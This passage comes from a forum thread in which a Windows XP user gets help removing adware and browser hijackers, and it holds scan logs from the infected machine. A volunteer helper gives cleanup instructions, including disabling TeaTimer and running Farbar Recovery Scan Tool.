BHO: Spybot-S&D IE Protection: {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: Search Helper: {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - c:\program files\microsoft\search enhancement pack\search helper\SEPsearchhelperie.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: SaverPro: {B1C50D68-A112-A194-98C5-6E673EC9E3A8} - c:\documents and settings\all users\application data\saverpro\HeV0cV.dll
BHO: MSN Toolbar BHO: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
TB: Acer eDataSecurity Management: {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - c:\windows\system32\eDStoolbar.dll
TB: MSN Toolbar: {8dcb7100-df86-4384-8842-8fa844297b3f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
TB: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - c:\program files\hp\digital imaging\smart web printing\hpswp_bho.dll
uRun: [SpybotSD TeaTimer] c:\program files\spybot - search & destroy\TeaTimer.exe
uRun: [SUPERAntiSpyware] c:\program files\superantispyware\SUPERAntiSpyware.exe
uRun: [Spotify Web Helper] "c:\documents and settings\jay\application data\spotify\data\SpotifyWebHelper.exe"
mRun: [LaunchApp] Alaunch
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [ntiMUI] c:\program files\newtech infosystems\nti cd & dvd-maker 7\ntiMUI.exe
mRun: [RemoteControl] "c:\program files\cyberlink\powerdvd\PDVDServ.exe"
mRun: [IMJPMIG8.1] "c:\windows\ime\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
mRun: [IMEKRMIG6.1] c:\windows\ime\imkr6_1\IMEKRMIG.EXE
mRun: [MSPY2002] c:\windows\system32\ime\pintlgnt\ImScInst.exe /SYNC
mRun: [PHIME2002ASync] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /SYNC
mRun: [PHIME2002A] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /IMEName
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [eDataSecurity Loader] c:\acer\empowering technology\edatasecurity\eDSloader.exe 0
mRun: [eRecoveryService] c:\acer\empowering technology\erecovery\eRAgent.exe
mRun: [QuickCare2.2] c:\program files\qwest\quickcare\bin\sprtcmd.exe /P QuickCare2.2
mRun: [AmazonGSDownloaderTray] c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderTray.exe
mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /nogui
mRun: [MSN Toolbar] "c:\program files\msn toolbar\platform\4.0.0357.1\mswinext.exe"
mRun: [Microsoft Default Manager] "c:\program files\microsoft\search enhancement pack\default manager\DefMgr.exe" -resume
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
mRun: [upfst_us_199.exe] c:\documents and settings\jay\local settings\application data\fst_us_199\upfst_us_199.exe -runhelper
mRun: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\iexplore.exe" /runcleanupscript
StartupFolder: c:\docume~1\jay\startm~1\programs\startup\mypcba~1.lnk - c:\qoobox\quarantine\c\program files\mypc backup\MyPC Backup.exe.vir
StartupFolder: c:\docume~1\jay\startm~1\programs\startup\_uninst_.lnk - c:\documents and settings\jay\local settings\temp\_uninst_.bat
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\acerwl~1.lnk - c:\program files\acer wlan 11g usb dongle\ZDWlan.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobeg~1.lnk - c:\program files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\hpdigi~1.lnk - c:\program files\hp\digital imaging\bin\hpqtra08.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\winzip~1.lnk - c:\program files\winzip\WZQKPICK.EXE
uPolicies-Explorer: NoDriveTypeAutoRun = dword:323
uPolicies-Explorer: NoDriveAutoRun = dword:67108863
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://pcpitstop.com/pcpitstop/PCPitStop.CAB
DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} - hxxp://www.kaspersky.com/kos/english/kavwebscan_unicode.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 69.144.127.53 68.116.46.115 71.9.127.107
TCP: Interfaces\{CFC10892-8484-42F4-A98A-DAFA48F3A805} : DHCPNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - c:\program files\superantispyware\SASSEH.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\jay\application data\mozilla\firefox\profiles\vthtiiie.default\
FF - prefs.js: browser.search.selectedEngine - default-search.net
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/
FF - prefs.js: keyword.URL - hxxp://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p=
FF - plugin: c:\documents and settings\jay\local settings\application data\robloxversions\version-759151294bb84441\NPRobloxProxy.dll
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\canon\zoombrowser ex\program\NPCIG.dll
FF - plugin: c:\program files\google\update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.20513.0\npctrlui.dll
FF - plugin: c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1211151.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_14_0_0_145.dll
FF - plugin: c:\windows\system32\npdeployJava1.dll
FF - plugin: c:\windows\system32\npptools.dll
FF - ExtSQL: !HIDDEN! 2009-09-02 18:55; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
FF - ExtSQL: !HIDDEN! 2011-09-19 21:23; smartwebprinting@hp.com; c:\program files\hp\digital imaging\smart web printing\MozillaAddOn3
.
============= SERVICES / DRIVERS ===============
.
R0 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys [2012-3-30 21576]
R0 aswNdis;avast! Firewall NDIS Filter Service;c:\windows\system32\drivers\aswNdis.sys [2011-9-5 12112]
R0 aswNdis2;avast! Firewall Core Firewall Service;c:\windows\system32\drivers\aswNdis2.sys [2011-9-5 204784]
R0 aswRvrt;aswRvrt;c:\windows\system32\drivers\aswRvrt.sys [2013-3-21 49376]
R0 aswVmm;aswVmm;c:\windows\system32\drivers\aswVmm.sys [2013-3-21 175176]
R1 aswFW;avast! TDI Firewall driver;c:\windows\system32\drivers\aswFW.sys [2011-9-5 104752]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-9-5 770344]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2011-9-5 369584]
R1 F06DEFF2-5B9C-490D-910F-35D3A9119622;F06DEFF2-5B9C-490D-910F-35D3A9119622;c:\program files\settings manager\smdmf\smdmfmgrc2.cfg [2014-8-10 34192]
R1 netfilter;netfilter;c:\windows\system32\drivers\netfilter.sys [2014-7-11 47488]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2011-7-22 12880]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2011-7-12 67664]
R2 !SASCORE;SAS Core Service;c:\program files\superantispyware\SASCore.exe [2011-8-11 116608]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2011-9-5 29816]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2013-3-21 66336]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2011-9-5 46808]
R2 avast! Firewall;avast! Firewall;c:\program files\avast software\avast\afwServ.exe [2011-9-5 137960]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files\common files\intuit\update service v4\IntuitUpdateService.exe [2012-2-6 13672]
R2 SmdmFService;SmdmF Service;c:\program files\settings manager\smdmf\SmdmFService.exe [2014-8-10 3572240]
S1 ssnfd;ssnfd;c:\windows\system32\drivers\ssnfd.sys --> c:\windows\system32\drivers\ssnfd.sys [?]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 sprtlisten;SupportSoft Listener Service;c:\program files\common files\supportsoft\bin\sprtlisten.exe /identity quickassist    --> c:\program files\common files\supportsoft\bin\sprtlisten.exe  [?]
S3 06624408;06624408; [x]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S4 Amazon Download Agent;Amazon Download Agent;c:\program files\amazon\amazon games & software downloader\amazongsdownloaderservice.exe --> c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderService.exe [?]
S4 Symantec Core LC;Symantec Core LC;"c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe" --> c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe [?]
.
=============== Created Last 30 ================
.
2014-08-11 01:57:20    --------    d-----w-    c:\documents and settings\all users\application data\ea5b54591d578367
2014-08-11 01:57:15    --------    d-----w-    c:\documents and settings\jay\AppData
2014-08-11 01:57:13    --------    d-----w-    c:\documents and settings\all users\application data\SaverPro
2014-08-11 01:46:44    --------    d-----w-    c:\documents and settings\all users\application data\Browser System Enahncer
2014-08-11 01:46:21    --------    d-----w-    c:\documents and settings\all users\application data\2308189059
2014-08-11 01:02:54    98816    ----a-w-    c:\windows\sed.exe
2014-08-11 01:02:54    256000    ----a-w-    c:\windows\PEV.exe
2014-08-11 01:02:54    208896    ----a-w-    c:\windows\MBR.exe
2014-08-11 01:02:14    --------    d-----w-    c:\program files\ToggleMark
2014-08-11 01:02:14    --------    d-----w-    c:\program files\Groovorio
2014-08-11 01:00:36    --------    d-----w-    c:\program files\0F467D68-149F-43B9-A30F-62DA8D197FC3
2014-08-11 00:59:53    --------    d-----w-    c:\documents and settings\jay\application data\VOPackage
2014-08-11 00:58:47    --------    d-----w-    c:\documents and settings\jay\local settings\application data\Linkey
2014-08-11 00:58:32    --------    d-----w-    c:\program files\Optimizer Pro
2014-08-11 00:58:16    --------    d-----w-    c:\documents and settings\jay\application data\FirefoxToolbar
2014-08-11 00:58:06    --------    d-----w-    c:\program files\Settings Manager
2014-08-11 00:57:51    --------    d-----w-    c:\documents and settings\jay\local settings\application data\fst_us_199
2014-08-11 00:57:50    --------    d-----w-    c:\program files\fst_us_199
2014-08-11 00:57:43    --------    d-----w-    c:\documents and settings\all users\application data\smdmf
2014-08-11 00:57:31    --------    d-----w-    c:\program files\005
2014-08-11 00:54:46    --------    d-----w-    c:\documents and settings\jay\local settings\application data\SearchProtect
2014-08-10 20:35:49    536576    ----a-w-    c:\windows\system32\sqlite3.dll
2014-08-10 20:32:56    --------    d-----w-    C:\AdwCleaner
2014-08-10 20:28:59    770384    ----a-w-    c:\program files\mozilla firefox\msvcr100.dll
.
==================== Find3M  ====================
.
2014-07-11 14:13:52    47488    ----a-w-    c:\windows\system32\drivers\netfilter.sys
2014-07-09 14:01:59    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-09 14:01:59    699056    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
.
============= FINISH: 22:54:40.34 ===============

 

3.  I do not have my original Windows CD.

 

 

Thank you in advance for your time and effort in assisting me!!



#4 Starbuck

Starbuck

    'r Brudiwr


  • Malware Response Team
  • 4,149 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Midlands, UK
  • Local time:02:24 PM

Posted 19 August 2014 - 03:03 PM

Hi rockgremlin

Please take note of the following:

1. Please do not run any other tools unless instructed.
2. Please don't install or uninstall anything unless asked.
3. The cleaning process is not instant. Please continue to review my answers until I tell you that your computer is clean.
4. If there's anything that you don't understand, please ask your question(s) before proceeding with the fixes.
5. Please reply to this thread. Do not start a new topic.
6. Please follow steps in the correct order.

Let's make things a bit easier for ourselves......

Please disable Spybot S&D’s TeaTimer protection, because it is known to interfere with our fixes.
  • Open Spybot and click on 'Mode' then click 'Advanced Mode'.
  • Click on 'Tools' in bottom left hand corner.
  • Click on the 'System Startup' icon.
    Uncheck 'Teatimer' box and/or uncheck 'Resident'.
  • Then, check next to the computer clock to see if the icon for Spybot is still there.
    If it is, right click it and choose 'exit Spybot-S&D Resident'.
Reboot the computer.

Or better still, once you have stopped Tea Timer from running... Uninstall Spybot.
We don't recommend it any more due to bad test results.
Avast will do the job a lot better anyway.

Recommendation.
SuperAntiSpyware doesn't need to start when Windows starts.
You can start it manually when you need to do a scan.

To change this:
Restart SuperAntiSpyware...
Then from the main page, Click on the Preferences button....then untick... 'Start SuperAntiSpyware when Windows starts'.
Then click Close. and then Close on the next screen to exit the program.


For x32 bit systems download Farbar Recovery Scan Tool and save it to your Desktop.
  • Double-click the downloaded icon to run the tool. Vista/Windows 7/8 users right-click and select Run As Administrator

    frsticon_zpsdc3cbdc3.png
  • When the tool opens click Yes to disclaimer.

    frstdis_zps7f598f12.png
  • Make sure that Addition.txt is selected at the bottom
  • Press Scan button.

    newfrst_zpsa63ffa3d.png
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please copy and paste it to your reply also.
In your next reply, please submit:
Both reports from FRST


Thanks.

BBPP6nz.png


#5 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 21 August 2014 - 10:46 PM

Cheers 'r Brudiwr,

 

Much obliged for the assistance. Followed all instructions, see attached files.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:21-08-2014
Ran by Jay (administrator) on MOLES on 21-08-2014 21:35:40
Running from C:\Documents and Settings\Jay\My Documents\Downloads
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Oracle Corporation) C:\Program Files\Java\jre7\bin\jqs.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.exe
(Cyberlink Corp.) C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(HiTRUST) C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
(Acer Inc.) C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corp.) C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Spotify Ltd) C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
(Aztec Media Inc) C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
(Aztec Media Inc) C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(X-Micro Technology Corp.) C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(WinZip Computing, S.L.) C:\Program Files\WinZip\WZQKPICK.EXE
(Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\Setup\avast.setup


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [LaunchApp] => Alaunch
HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [16207872 2006-05-17] (Realtek Semiconductor Corp.)
HKLM\...\Run: [SkyTel] => C:\WINDOWS\SkyTel.EXE [2879488 2006-05-15] (Realtek Semiconductor Corp.)
HKLM\...\Run: [ntiMUI] => c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe [45056 2005-05-11] ()
HKLM\...\Run: [RemoteControl] => C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe [32768 2004-11-02] (Cyberlink Corp.)
HKLM\...\Run: [IMJPMIG8.1] => C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE [208952 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [IMEKRMIG6.1] => C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE [44032 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [MSPY2002] => C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe [59392 2004-08-03] ()
HKLM\...\Run: [PHIME2002ASync] => C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE [455168 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [PHIME2002A] => C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE [455168 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [eDataSecurity Loader] => C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe [345088 2006-03-17] (HiTRUST)
HKLM\...\Run: [eRecoveryService] => C:\Acer\Empowering Technology\eRecovery\eRAgent.exe [413696 2006-06-01] (Acer Inc.)
HKLM\...\Run: [QuickCare2.2] => C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe [198184 2007-05-04] ()
HKLM\...\Run: [AmazonGSDownloaderTray] => C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe [247296 2009-04-06] (Amazon.com)
HKLM\...\Run: [avast] => C:\Program Files\AVAST Software\Avast\avastUI.exe [4858968 2013-05-09] (AVAST Software)
HKLM\...\Run: [MSN Toolbar] => C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe [240992 2009-11-16] (Microsoft Corp.)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [288080 2009-07-17] (Microsoft Corporation)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-10-11] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421776 2012-09-09] (Apple Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2012-10-25] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM\...\Run: [upfst_us_199.exe] => C:\Documents and Settings\Jay\Local Settings\Application Data\fst_us_199\upfst_us_199.exe -runhelper
HKLM\...\Run: [Malwarebytes Anti-Malware (reboot)] => "C:\Program Files\Malwarebytes' Anti-Malware\iexplore.exe" /runcleanupscript
HKLM\...\Run: [fst_us_199] => [X]
Winlogon\Notify\!SASWinLogon: C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
HKU\S-1-5-21-943902637-2227688448-3181155623-1005\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [4603264 2011-08-12] ()
HKU\S-1-5-21-943902637-2227688448-3181155623-1005\...\Run: [Spotify Web Helper] => C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe [1103768 2013-02-16] (Spotify Ltd)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Acer WLAN 11g USB Dongle.lnk
ShortcutTarget: Acer WLAN 11g USB Dongle.lnk -> C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe (X-Micro Technology Corp.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk
ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
Startup: C:\Documents and Settings\Jay\Start Menu\Programs\Startup\MyPC Backup.lnk
ShortcutTarget: MyPC Backup.lnk -> C:\Qoobox\Quarantine\C\Program Files\MyPC Backup\MyPC Backup.exe.vir (MyPCBackup.com)
HKLM\...\AppCertDlls: [x64] -> c:\program files\settings manager\smdmf\x64\sysapcrt.dll
HKLM\...\AppCertDlls: [x86] -> c:\program files\settings manager\smdmf\sysapcrt.dll [488464 2014-07-28] ()
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: http=127.0.0.1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://groovorio.com/?f=1&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
SearchScopes: HKLM - DefaultScope {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
SearchScopes: HKLM - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2516} URL = http://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p={searchTerms}
